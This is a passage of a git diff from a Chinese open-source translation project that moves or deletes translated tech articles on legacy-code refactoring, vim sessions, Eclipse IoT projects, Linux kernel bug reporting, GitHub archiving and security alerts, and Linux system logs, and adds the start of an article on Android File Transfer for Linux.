的众多网友指出了这一点并且证明他们是对的:第一步是确认你知道在生产环境下运行着什么东西,也意味着你需要在你的设备上构建一个跟生产环境上运行的版本每一个字节都一模一样的版本。如果你找不到实现它的办法,一旦你将它投入生产环境,你很可能会遭遇一些很糟糕的事情。确保每一部分都尽力测试,之后在你足够信任它能够很好的运行的时候将它部署生产环境下。无论它运行的怎么样都要做好能够马上切换回旧版本的准备,确保日志记录下了所有情况,以便于接下来不可避免的 “验尸” 。 - -### 冻结数据库 - -直到你修改代码之前尽可能冻结你的数据库,在你特别熟悉代码库和遗留代码之后再去修改数据库。在这之前过早的修改数据库的话,你可能会碰到大问题,你会失去让新旧代码和数据库一起构建稳固的基础的能力。保持数据库完全不变,就能比较新的逻辑代码和旧的逻辑代码运行的结果,比较的结果应该跟预期的没有差别。 - -### 写测试 - -在你做任何改变之前,尽可能多的写下端到端测试和集成测试。在你能够清晰的知道旧的是如何工作的情况下确保这些测试能够正确的输出(准备好应对一些突发状况)。这些测试有两个重要的作用,其一,他们能够在早期帮助你抛弃一些错误观念,其二,在你写新代码替换旧代码的时候也有一定防护作用。 - -自动化测试,如果你也有 CI 的使用经验请使用它,并且确保在你提交代码之后能够快速的完成所有测试。 - -### 日志监控 - -如果旧设备依然可用,那么添加上监控功能。使用一个全新的数据库,为每一个你能想到的事件都添加一个简单的计数器,并且根据这些事件的名字添加一个函数增加这些计数器。用一些额外的代码实现一个带有时间戳的事件日志,这是一个好办法知道有多少事件导致了另外一些种类的事件。例如:用户打开 APP ,用户关闭 APP 。如果这两个事件导致后端调用的数量维持长时间的不同,这个数量差就是当前打开的 APP 的数量。如果你发现打开 APP 比关闭 APP 多的时候,你就必须要知道是什么原因导致 APP 关闭了(例如崩溃)。你会发现每一个事件都跟其他的一些事件有许多不同种类的联系,通常情况下你应该尽量维持这些固定的联系,除非在系统上有一个明显的错误。你的目标是减少那些错误的事件,尽可能多的在开始的时候通过使用计数器在调用链中降低到指定的级别。(例如:用户支付应该得到相同数量的支付回调)。 - -这是简单的技巧去将每一个后端应用变成一个就像真实的簿记系统一样,所有数字必须匹配,只要他们在某个地方都不会有什么问题。 - -随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 出现的位置,以及对多种计数器造成的影响。 - -我通常保持 5 分钟(一小时 12 次)记录一次计数器,如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 - -### 一次只修改一处 - -不要完全陷入在提高代码或者平台可用性的同时添加新特性或者是修复 BUG 的陷阱。这会让你头大而且将会使你之前建立的测试失效,现在必须问问你自己,每一步的操作想要什么样的结果。 - -### 修改平台 - -如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不要忘记这一点,所有的业务逻辑和相互依赖跟从前一样保持不变。 - -### 修改架构 - -接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让他模块化的时候,将大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 - -Hacker News [mannykannot][1] 网友指出,修改架构并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这一点,我应该加上这一点,因此这里有一些补充。我非常想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,所以尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 - -### 底层代码的重构 - -现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录模块并且理解之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 - -### 修复 bugs - -现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs,像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 - -### 升级数据库 - - -如果在一个坚实且可维护的代码库上完成所有工作,如果你有更改数据库模式的计划,可以使用不同的完全替换数据库。 -把所有的这些都做完将能够帮助你更可靠的修改而不会碰到问题,你会完全的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 - -### 按着路线图执行 - -祝贺你脱离的困境并且可以准备添加新功能了。 - -### 任何时候都不要尝试彻底重写 - -彻底重写是那种注定会失败的项目,一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天,非常不幸的是,这也是你失败的时候,假设业务逻辑存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你足够聪明,彻底重写系统通常不会成为一个摆到桌上讨论的选项。 - -### 所以,替代方法是增量迭代工作 - -要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,他可以是内核模块),试着使用旧的上下文去增量提升,如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面)至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两行。 - -### 发布! - -每一次的修改都发布到生产环境,即使一些修改不是用户可见的。使用最少的步骤也是很重要的,因为当你缺乏对系统的了解时,只有生产环境能够告诉你问题在哪里,如果你只做了一个很小的修改之后出了问题,会有一些好处: - -* 很容易弄清楚出了什么问题 -* 这是一个改进流程的好位置 -* 你应该马上更新文档展示你的新见解 - -### 使用代理的好处 -如果你做 web 开发时在旧系统和用户之间加了代理。你能很容易的控制每一个网址哪些请求旧系统,哪些重定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止,如果你的集成测试也连接到这个接口那就更好了。 - -### 是的,这会花费很多时间 -这取决于你怎样看待它的,这是事实会有一些重复的工作涉及到这些步骤中。但是它确实有效,对于进程的任何一个优化都将使你对这样系统更加熟悉。我会保持声誉,并且我真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,而且可能会影响客户。在这样的情况下,如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 - --------------------------------------------------------------------------------- - -via: https://jacquesmattheij.com/improving-a-legacy-codebase - -作者:[Jacques Mattheij][a] -译者:[aiwhj](https://github.com/aiwhj) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jacquesmattheij.com/ -[1]:https://news.ycombinator.com/item?id=14445661 diff --git a/translated/tech/20170910 Cool vim feature sessions.md b/translated/tech/20170910 Cool vim feature sessions.md deleted file mode 100644 index 49ee43fda1..0000000000 --- a/translated/tech/20170910 Cool vim feature sessions.md +++ /dev/null @@ -1,44 +0,0 @@ -vim 的酷功能:会话! -============================================================• - -昨天我在编写我的[vimrc][5]的时候了解到一个很酷的 vim 功能!(主要为了添加 fzf 和 ripgrep 插件)。这是一个内置功能,不需要特别的插件。 - -所以我画了一个漫画。 - -基本上你可以用下面的命令保存所有你打开的文件和当前的状态 - -``` -:mksession ~/.vim/sessions/foo.vim - -``` - -接着用 `:source ~/.vim/sessions/foo.vim` 或者  `vim -S ~/.vim/sessions/foo.vim` 还原会话。非常酷! - -一些 vim 插件给 vim 会话添加了额外的功能: - -* [https://github.com/tpope/vim-obsession][1] - -* [https://github.com/mhinz/vim-startify][2] - -* [https://github.com/xolox/vim-session][3] - -这是漫画: - -![](https://jvns.ca/images/vimsessions.png) - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/09/10/vim-sessions/ - -作者:[Julia Evans ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://github.com/tpope/vim-obsession -[2]:https://github.com/mhinz/vim-startify -[3]:https://github.com/xolox/vim-session -[4]:https://jvns.ca/categories/vim -[5]:https://github.com/jvns/vimconfig/blob/master/vimrc diff --git a/published/20171009 Examining network connections on Linux systems.md b/translated/tech/20171009 Examining network connections on Linux systems.md similarity index 100% rename from published/20171009 Examining network connections on Linux systems.md rename to translated/tech/20171009 Examining network connections on Linux systems.md diff --git a/translated/tech/20171020 How Eclipse is advancing IoT development.md b/translated/tech/20171020 How Eclipse is advancing IoT development.md deleted file mode 100644 index 0de4f38ea1..0000000000 --- a/translated/tech/20171020 How Eclipse is advancing IoT development.md +++ /dev/null @@ -1,77 +0,0 @@ -translated by smartgrids -Eclipse 如何助力 IoT 发展 -============================================================ - -### 开源组织的模块发开发方式非常适合物联网。 - -![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") -图片来源: opensource.com - -[Eclipse][3] 可能不是第一个去研究物联网的开源组织。但是,远在 IoT 家喻户晓之前,该基金会在 2001 年左右就开始支持开源软件发展商业化。九月 Eclipse 物联网日和 RedMonk 的 [ThingMonk 2017][4] 一块举行,着重强调了 Eclipse 在 [物联网发展][5] 中的重要作用。它现在已经包含了 28 个项目,覆盖了大部分物联网项目需求。会议过程中,我和负责 Eclipse 市场化运作的 [Ian Skerritt][6] 讨论了 Eclipse 的物联网项目以及如何拓展它。 - -###物联网的最新进展? -我问 Ian 物联网同传统工业自动化,也就是前几十年通过传感器和相应工具来实现工厂互联的方式有什么不同。 Ian 指出很多工厂是还没有互联的。 -另外,他说“ SCADA[监控和数据分析] 系统以及工厂底层技术都是私有、独立性的。我们很难去改变它,也很难去适配它们…… 现在,如果你想运行一套生产系统,你需要设计成百上千的单元。生产线想要的是满足用户需求,使制造过程更灵活,从而可以不断产出。” 这也就是物联网会带给制造业的一个很大的帮助。 - - -###Eclipse 物联网方面的研究 -Ian 对于 Eclipse 在物联网的研究是这样描述的:“满足任何物联网解决方案的核心基础技术” ,通过使用开源技术,“每个人都可以使用从而可以获得更好的适配性。” 他说,Eclipse 将物联网视为包括三层互联的软件栈。从更高的层面上看,这些软件栈(按照大家常见的说法)将物联网描述为跨越三个层面的网络。特定的观念可能认为含有更多的层面,但是他们一直符合这个三层模型的功能的: - -* 一种可以装载设备(例如设备、终端、微控制器、传感器)用软件的堆栈。 -* 将不同的传感器采集到的数据信息聚合起来并传输到网上的一类网关。这一层也可能会针对传感器数据检测做出实时反映。 -* 物联网平台后端的一个软件栈。这个后端云存储数据并能根据采集的数据比如历史趋势、预测分析提供服务。 - -这三个软件栈在 Eclipse 的白皮书 “ [The Three Software Stacks Required for IoT Architectures][7] ”中有更详细的描述。 - -Ian 说在这些架构中开发一种解决方案时,“需要开发一些特殊的东西,但是很多底层的技术是可以借用的,像通信协议、网关服务。需要一种模块化的方式来满足不用的需求场合。” Eclipse 关于物联网方面的研究可以概括为:开发模块化开源组件从而可以被用于开发大量的特定性商业服务和解决方案。 - -###Eclipse 的物联网项目 - -在众多一杯应用的 Eclipse 物联网应用中, Ian 举了两个和 [MQTT][8] 有关联的突出应用,一个设备与设备互联(M2M)的物联网协议。 Ian 把它描述成“一个专为重视电源管理工作的油气传输线监控系统的信息发布/订阅协议。MQTT 已经是众多物联网广泛应用标准中很成功的一个。” [Eclipse Mosquitto][9] 是 MQTT 的代理,[Eclipse Paho][10] 是他的客户端。 -[Eclipse Kura][11] 是一个物联网网关,引用 Ian 的话,“它连接了很多不同的协议间的联系”包括蓝牙、Modbus、CANbus 和 OPC 统一架构协议,以及一直在不断添加的协议。一个优势就是,他说,取代了你自己写你自己的协议, Kura 提供了这个功能并将你通过卫星、网络或其他设备连接到网络。”另外它也提供了防火墙配置、网络延时以及其它功能。Ian 也指出“如果网络不通时,它会存储信息直到网络恢复。” - -最新的一个项目中,[Eclipse Kapua][12] 正尝试通过微服务来为物联网云平台提供不同的服务。比如,它集成了通信、汇聚、管理、存储和分析功能。Ian 说“它正在不断前进,虽然还没被完全开发出来,但是 Eurotech 和 RedHat 在这个项目上非常积极。” -Ian 说 [Eclipse hawkBit][13] ,软件更新管理的软件,是一项“非常有趣的项目。从安全的角度说,如果你不能更新你的设备,你将会面临巨大的安全漏洞。”很多物联网安全事故都和无法更新的设备有关,他说,“ HawkBit 可以基本负责通过物联网系统来完成扩展性更新的后端管理。” - -物联网设备软件升级的难度一直被看作是难度最高的安全挑战之一。物联网设备不是一直连接的,而且数目众多,再加上首先设备的更新程序很难完全正常。正因为这个原因,关于无赖女王软件升级的项目一直是被当作重要内容往前推进。 - -###为什么物联网这么适合 Eclipse - -在物联网发展趋势中的一个方面就是关于构建模块来解决商业问题,而不是宽约工业和公司的大物联网平台。 Eclipse 关于物联网的研究放在一系列模块栈、提供特定和大众化需求功能的项目,还有就是指定目标所需的可捆绑式中间件、网关和协议组件上。 - - --------------------------------------------------------------------------------- - - - -作者简介: - -Gordon Haff - Gordon Haff 是红帽公司的云营销员,经常在消费者和工业会议上讲话,并且帮助发展红帽全办公云解决方案。他是 计算机前言:云如何如何打开众多出版社未来之门 的作者。在红帽之前, Gordon 写了成百上千的研究报告,经常被引用到公众刊物上,像纽约时报关于 IT 的议题和产品建议等…… - --------------------------------------------------------------------------------- - -转自: https://opensource.com/article/17/10/eclipse-and-iot - -作者:[Gordon Haff ][a] -译者:[smartgrids](https://github.com/smartgrids) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/ghaff -[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg -[2]:https://opensource.com/user/21220/feed -[3]:https://www.eclipse.org/home/ -[4]:http://thingmonk.com/ -[5]:https://iot.eclipse.org/ -[6]:https://twitter.com/ianskerrett -[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf -[8]:http://mqtt.org/ -[9]:https://projects.eclipse.org/projects/technology.mosquitto -[10]:https://projects.eclipse.org/projects/technology.paho -[11]:https://www.eclipse.org/kura/ -[12]:https://www.eclipse.org/kapua/ -[13]:https://eclipse.org/hawkbit/ -[14]:https://opensource.com/users/ghaff -[15]:https://opensource.com/users/ghaff -[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments diff --git a/published/20171029 A block layer introduction part 1 the bio layer.md b/translated/tech/20171029 A block layer introduction part 1 the bio layer.md similarity index 95% rename from published/20171029 A block layer introduction part 1 the bio layer.md rename to translated/tech/20171029 A block layer introduction part 1 the bio layer.md index 96374c2302..bc3f582259 100644 --- a/published/20171029 A block layer introduction part 1 the bio layer.md +++ b/translated/tech/20171029 A block layer introduction part 1 the bio layer.md @@ -1,4 +1,4 @@ -回复:块层介绍第一部分 - 块 I/O 层 +块层介绍第一部分:块 I/O 层 ============================================================ ### 块层介绍第一部分:块 I/O 层 @@ -6,14 +6,9 @@ 回复:amarao 在[块层介绍第一部分:块 I/O 层][1] 中提的问题 先前的文章:[块层介绍第一部分:块 I/O 层][2] -![](https://static.lwn.net/images/2017/neil-blocklayer.png) - 嗨, - 你在这里描述的问题与块层不直接相关。这可能是一个驱动错误、可能是一个 SCSI 层错误,但绝对不是一个块层的问题。 - 不幸的是,报告针对 Linux 的错误是一件难事。有些开发者拒绝去看 bugzilla,有些开发者喜欢它,有些(像我这样)只能勉强地使用它。 - 另一种方法是发送电子邮件。为此,你需要选择正确的邮件列表,还有也许是正确的开发人员,当他们心情愉快,或者不是太忙或者不是假期时找到它们。有些人会努力回复所有,有些是完全不可预知的 - 这对我来说通常会发送一个补丁,包含一些错误报告。如果你只是有一个你自己几乎都不了解的 bug,那么你的预期响应率可能会更低。很遗憾,但这是是真的。 许多 bug 都会得到回应和处理,但很多 bug 都没有。 @@ -21,20 +16,18 @@ 我不认为说没有人关心是公平的,但是没有人认为它如你想的那样重要是有可能的。如果你想要一个解决方案,那么你需要驱动它。一个驱动它的方法是花钱请顾问或者与经销商签订支持合同。我怀疑你的情况没有上面的可能。另一种方法是了解代码如何工作,并自己找到解决方案。很多人都这么做,但是这对你来说可能不是一种选择。另一种方法是在不同的相关论坛上不断提出问题,直到得到回复。坚持可以见效。你需要做好准备去执行任何你所要求的测试,可能包括建立一个新的内核来测试。 如果你能在最近的内核(4.12 或者更新)上复现这个 bug,我建议你邮件报告给 linux-kernel@vger.kernel.org、linux-scsi@vger.kernel.org 和我(neilb@suse.com)(注意你不必订阅这些列表来发送邮件,只需要发送就行)。描述你的硬件以及如何触发问题的。 - 包含所有进程状态是 “D” 的栈追踪。你可以用 “cat /proc/$PID/stack” 来得到它,这里的 “$PID” 是进程的 pid。 确保避免抱怨或者说这个已经坏了好几年了以及这是多么严重不足。没有人关心这个。我们关心的是 bug 以及如何修复它。因此只要报告相关的事实就行。 - 尝试在邮件中而不是链接到其他地方的链接中包含所有事实。有时链接是需要的,但是对于你的脚本,它只有 8 行,所以把它包含在邮件中就行(并避免像 “fuckup” 之类的描述。只需称它为“坏的”(broken)或者类似的)。同样确保你的邮件发送的不是 HTML 格式。我们喜欢纯文本。HTML 被所有的 @vger.kernel.org 邮件列表拒绝。你或许需要配置你的邮箱程序不发送 HTML。 -------------------------------------------------------------------------------- via: https://lwn.net/Articles/737655/ -作者:[neilbrown][a] +作者:[ neilbrown][a] 译者:[geekpi](https://github.com/geekpi) -校对:[wxy](https://github.com/wxy) +校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20171108 Archiving repositories.md b/translated/tech/20171108 Archiving repositories.md deleted file mode 100644 index 3d1a328541..0000000000 --- a/translated/tech/20171108 Archiving repositories.md +++ /dev/null @@ -1,37 +0,0 @@ -归档仓库 -==================== - - -因为仓库不再活跃开发或者你不想接受额外的贡献并不意味着你想要删除它。现在在 Github 上归档仓库让它变成只读。 - - [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] - -归档一个仓库让它对所有人只读(包括仓库拥有者)。这包括编辑仓库、问题、合并请求、标记、里程碑、维基、发布、提交、标签、分支、反馈和评论。没有人可以在一个归档的仓库上创建新的问题、合并请求或者评论,但是你仍可以 fork 仓库-允许归档的仓库在其他地方继续开发。 - -要归档一个仓库,进入仓库设置页面并点在这个仓库上点击归档。 - - [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] - -在归档你的仓库前,确保你已经更改了它的设置并考虑关闭所有的开放问题和合并请求。你还应该更新你的 README 和描述来让它让访问者了解他不再能够贡献。 - -如果你改变了主意想要解除归档你的仓库,在相同的地方点击解除归档。请注意大多数归档仓库的设置是隐藏的,并且你需要解除归档来改变它们。 - - [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] - -要了解更多,请查看[这份文档][4]中的归档仓库部分。归档快乐! - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2460-archiving-repositories - -作者:[MikeMcQuaid ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/MikeMcQuaid -[1]:https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png -[2]:https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png -[3]:https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png -[4]:https://help.github.com/articles/about-archiving-repositories/ diff --git a/translated/tech/20171116 Introducing security alerts on GitHub.md b/translated/tech/20171116 Introducing security alerts on GitHub.md deleted file mode 100644 index b8f0afba17..0000000000 --- a/translated/tech/20171116 Introducing security alerts on GitHub.md +++ /dev/null @@ -1,48 +0,0 @@ -介绍 GitHub 上的安全警报 -==================================== - - -上个月,我们用依赖关系图让你更容易跟踪你代码依赖的的项目,目前支持 Javascript 和 Ruby。如今,超过 75% 的 GitHub 项目有依赖,我们正在帮助你做更多的事情,而不只是关注那些重要的项目。在启用依赖关系图后,当我们检测到你的依赖中有漏洞或者来自 Github 社区中建议的已知修复时通知你。 - - [![Security Alerts & Suggested Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] - -### 如何开始使用安全警报 - -无论你的项目时私有还是公有的,安全警报都会为团队中的正确人员提供重要的漏洞信息。 - -启用你的依赖图 - -公开仓库将自动启用依赖关系图和安全警报。对于私人仓库,你需要在仓库设置中添加安全警报,或者在 “Insights” 选项卡中允许访问仓库的 “依赖关系图” 部分。 - -设置通知选项 - -启用依赖关系图后,管理员将默认收到安全警报。管理员还可以在依赖关系图设置中将团队或个人添加为安全警报的收件人。 - -警报响应 - -当我们通知你潜在的漏洞时,我们将突出显示我们建议更新的任何依赖关系。如果存在已知的安全版本,我们将使用机器学习和公开数据中选择一个,并将其包含在我们的建议中。 - -### 漏洞覆盖率 - -有 [CVE ID][2](公开披露的[国家漏洞数据库][3]中的漏洞)的漏洞将包含在安全警报中。但是,并非所有漏洞都有 CVE ID,甚至许多公开披露的漏洞也没有。随着安全数据的增长,我们将继续更好地识别漏洞。如需更多帮助来管理安全问题,请查看我们的[ GitHub Marketplace 中的安全合作伙伴][4]。 - -这是使用世界上最大的开源数据集的下一步,可以帮助你保持代码安全并做到最好。依赖关系图和安全警报目前支持 JavaScript 和 Ruby,并将在 2018 年提供 Python 支持。 - -[了解更多关于安全警报][5] - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2470-introducing-security-alerts-on-github - -作者:[mijuhan ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/mijuhan -[1]:https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif -[2]:https://cve.mitre.org/ -[3]:https://nvd.nist.gov/ -[4]:https://github.com/marketplace/category/security -[5]:https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies/ diff --git a/translated/tech/20171117 System Logs: Understand Your Linux System.md b/translated/tech/20171117 System Logs: Understand Your Linux System.md deleted file mode 100644 index dceea12a63..0000000000 --- a/translated/tech/20171117 System Logs: Understand Your Linux System.md +++ /dev/null @@ -1,68 +0,0 @@ -### 系统日志: 了解你的Linux系统 - -![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) - By: [chabowski][1] - -本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明. - -本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,转为创新企业提供富有伸缩性的解决方案. - -Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么. - -![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) - -Photo by Markus Spiske on Unsplash - -有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们. -在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。 -由 `systemd` 记录的日志以二进制格式存储, 这使地它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看. -好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方. - -只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录: - -``` -Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. -``` - -这条独立的日志记录以此包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身. - -若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中. -有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题. -![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) -不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果. - -解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么. -据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的. - -比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序. -如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果. -你可以对比一下图1和图2. - -![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) - -图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用. - -![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) - -图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用. - -也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于 `/var/log/zypper.log` 记录openSUSE包管理器的行为; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动的特别块,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误. -另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看). -`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误. - -希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心! - --------------------------------------------------------------------------------- - -via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ - -作者:[chabowski] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.suse.com/communities/blog/author/chabowski/ -[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux -[3]:https://en.opensuse.org/Portal:42.3 -[4]:http://www.linux-magazine.com/ diff --git a/translated/tech/20171124 How to Install Android File Transfer for Linux.md b/translated/tech/20171124 How to Install Android File Transfer for Linux.md new file mode 100644 index 0000000000..b93429f509 --- /dev/null +++ b/translated/tech/20171124 How to Install Android File Transfer for Linux.md @@ -0,0 +1,82 @@ +Translating by wenwensnow + +# 如何在Linux下安装安卓文件传输助手 + +如果你尝试在Ubuntu下安装你的安卓手机,你也许可以试试Linux下的安卓文件传输助手 + +本质上来说,这个应用是谷歌mac版本的一个复制。它是用Qt编写的,用户界面非常简洁,使得你能轻松在Ubuntu和安卓手机之间传输文件。 + +现在,有可能一部分人想知道有什么是这个应用可以做,而Nautilus(Ubuntu默认的文件资源管理器)不能做的,答案是没有。 + +当我将我的 Nexus 5X(记得选择[MTP][7] 选项)连接在Ubuntu上时,在[GVfs][8](Gnome桌面下的虚拟文件系统)的帮助下,我可以打开,浏览和管理我的手机, 就像它是一个普通的U盘一样。 + + [![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] + +但是一些用户在使用默认的文件管理器时,在MTP的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 + +这就是要为Linux系统用户设计一个安卓文件传输助手应用的原因。将这个应用当做将MTP设备安装在Linux下的另一种选择。如果你使用Linux下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 + + +![Android File Transfer Linux 